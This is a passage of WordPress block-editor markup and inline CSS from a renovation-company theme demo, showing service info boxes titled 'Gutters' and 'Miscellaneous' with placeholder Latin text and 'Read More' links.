.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ae0d7f03-a30d-438a-9db9-6de087194c7c\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-ae0d7f03-a30d-438a-9db9-6de087194c7c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"7c398a30-3a74-4ab1-b45d-62ced1bb0f57\"} -->\n<style type=\"text/css\"> .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"aff0817d-6564-42a6-8efc-48ebb76c7727\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-aff0817d-6564-42a6-8efc-48ebb76c7727\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"e1ad1827-531b-40c1-8789-14bfbfe4da88\"} -->\n<style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"567cec0e-bcfe-4c69-9c80-5643480659ef\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-567cec0e-bcfe-4c69-9c80-5643480659ef\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"6144aa30-a171-49e0-ba02-9fdbf6c0339a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\"><strong>Miscellaneous</strong></h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"d3c03c5f-5606-4310-98a4-30d73f9945ed\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 